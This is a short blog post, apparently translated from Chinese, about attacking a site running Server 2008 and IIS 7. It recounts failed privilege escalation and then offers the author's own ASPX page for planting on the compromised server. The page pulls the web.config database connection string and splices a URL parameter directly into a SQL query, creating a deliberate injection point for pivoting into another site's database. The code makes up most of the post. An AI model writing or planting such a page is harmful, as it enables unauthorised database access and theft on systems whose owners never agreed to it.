Yesterday 4z1 and I were looking at a site. Privilege escalation was really hard; we spent a full 5 hours on it with nothing to show for it. Server 2008 + IIS 7, no sa, no root, none of the usual services...
While working on it we used an aspx page that constructs an injection point to go cross-site. I found a pile of code online and not one piece of it worked.
It isn't much code, so I just wrote one myself and was done with it. Such a pain.
    <%@ Page Language="C#" %>
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml">
    <head runat="server">
        <title>暗影aspx构造注射专用页面</title>
    </head>
    <body>
        <form id="form1" runat="server">
        <div>
        <script language="c#" runat="server">
            void Page_Init(object sender, EventArgs e)
            {
                System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();
                // "连接名" is the name of the connection string entry in web.config
                conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ConnectionString;
                conn.Open();

                string i = this.Page.Request.Params["xxser"]; // the parameter: ?xxser=1

                // The parameter is concatenated straight into the SQL text, so whatever is
                // passed in ?xxser= becomes part of the query; this is the injection point
                // the post describes
                System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);
                // ExecuteNonQuery returns -1 for a SELECT; a SQL error propagates as an
                // unhandled exception
                int x = command.ExecuteNonQuery();
                Response.Write(i + "\n");
                Response.Write(x);
                conn.Close();
            }
        </script>
        </div>
        </form>
    </body>
    </html>